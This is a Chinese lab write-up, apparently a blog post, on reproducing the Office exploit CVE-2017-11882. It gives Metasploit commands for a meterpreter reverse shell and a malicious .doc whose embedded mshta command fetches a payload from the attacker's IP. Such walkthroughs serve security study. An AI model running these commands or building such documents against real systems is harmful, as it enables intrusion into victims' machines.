2017年11月14日,微软发布了11月份的安全补丁更新,修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882),这是个Office内存破坏漏洞,影响目前流行的所有Office版本,攻击者可以利用漏洞以当前登录的用户的身份执行任意命令,对于企业来说危害很大。最大的亮点就是这个漏洞完美无弹窗,无视宏,影响Ms offcie全版本,#手动滑稽。
这么厉害的一个漏洞看的我心里还是很痒痒的,今天咱们就把这个漏洞的利用过程复现一番~
实验工具使用的是网上之前放出的Poc以及一个Command43b_CVE-2017-11882.py脚本文件,使用python执行Command43b_CVE-2017-11882.py文件:
可以看到这里生成了一个名为test.doc的office文档,我们打开试一下:
打开office文档之后立刻跳出了一个计算器,也就是说,利用这个漏洞,我们可以通过office执行其他很多微妙的操作~
既然有这个想法,那么咱们就祭出渗透大杀器Kali来一窥究竟!
实验准备:
攻击机:kali
靶机:windows7
实验工具:MSF渗透平台、Command43b_CVE-2017-11882.py、PS_shell.rb、ms17-010.rb(其中PS_shell.rb和ms17-010.rb分别是这个漏洞和之前爆出的“永恒之蓝”漏洞的利用模块)
实验开始:
首先打开kali,查看IP,可以看到我的虚拟机kali的IP是192.168.1.104。
把Command43b_CVE-2017-11882.py和 PS_shell.rb文件放入kali。
我系统中ms17-010.rb文件的路径是:
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb
这里需要把PS_shell.rb放入smb路径下,然后我这里就PS_shell.rb和ms17-010.rb放在了一起。
接下来,我们需要请出MSF:
终端下输入:
Msfconsole
然后重新加载所有模块:
reload_all
接下来输入命令:
search PS_shell
调用攻击模块:
use /exploits/windows/smb/PS_shell
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.104
set uripath abc
exploit
这一步会出现:
started reverse tcp hander on 192.168.1.104:4444
using url,local ip,,,
mshta.exe"http://192.168.1.104:8080/abc"
如图:
接下来我们要在kali下使用Command43b_CVE-2017-11882.py 这个脚本。
在桌面打开终端执行命令生成刚才演示的这个test.doc:
python Command43b_CVE-2017-11882.py -c"mshta http://192.168.1.104:8080/abc" -o test.doc
将其复制到 win7里再用 office2013 打开,这里在win7中打开文档的时候,kali下msf里输入sessions
然后就得到了喜闻乐见的shell~
至此,漏洞体验结束,总的来说这个漏洞非常灵活好用,如果搭配文件上传之类的漏洞整个过程估计会体验极好~
很惭愧,只做了一点微小的工作,谢谢大家!
閱讀更多 軒轅攻防實驗室 的文章